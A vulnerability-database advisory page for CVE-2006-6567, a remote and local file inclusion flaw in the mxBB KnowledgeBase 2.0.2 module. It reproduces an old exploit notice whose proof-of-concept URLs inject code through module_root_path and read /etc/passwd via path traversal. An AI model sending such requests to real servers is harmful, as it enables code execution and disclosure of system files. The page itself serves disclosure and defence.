MXBB KB_Mods 模块 'KB_Constants.PHP'多个文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111761 漏洞类型 输入验证
发布时间 2006-12-12 更新时间 2006-12-15
CVE编号 CVE-2006-6567 CNNVD-ID CNNVD-200612-344
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/2924
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-344
|漏洞详情
mxBB的KnowledgeBase(mx_kb)2.0.2模块中的includes/kb_constants.php存在PHP远程文件包含漏洞,远程攻击者可以通过module_root_path参数中的URL执行任意PHP代码。
|漏洞EXP
_____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
                        Knowledgebase kb_mods  Multiple Remote
Vulnerablities
                            Remote File Inclusion & Local File Inclusion
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
Script:knowledgebase
Version:2.0.2
Download:http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=55
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
Author:Dr Max Virus
Location:Egypt
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
Bug in :includes/common.php
Vul Code:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
Problem:The variable of phpEx & many variables are not sanitized
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
POC:
http://[target]/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=Evil Code
http://[target]/mxBB/modules/kb_mods/includes/kb_constants.php?kb_constants.php&board_config[default_lang]=english&phpEx=../../..
/../../etc/passwd
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
Thx to:str0ke & All My Friends
Special Gr33ts:AsianEagle & The Master & Kacper & HotTurk
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=

# milw0rm.com [2006-12-12]
|参考资料

来源:XF
名称:mxbbknowledge-kb-file-include(30856)
链接:http://xforce.iss.net/xforce/xfdb/30856
来源:BID
名称:21577
链接:http://www.securityfocus.com/bid/21577
来源:MILW0RM
名称:2924
链接:http://www.milw0rm.com/exploits/2924
来源:VUPEN
名称:ADV-2006-4982
链接:http://www.frsirt.com/english/advisories/2006/4982
来源:SECUNIA
名称:23356
链接:http://secunia.com/advisories/23356
来源:MILW0RM
名称:2924
链接:http://milw0rm.com/exploits/2924